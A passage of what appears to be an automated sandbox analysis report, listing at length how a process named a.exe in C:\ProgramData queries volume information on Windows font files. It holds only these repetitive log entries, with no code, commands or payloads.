Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
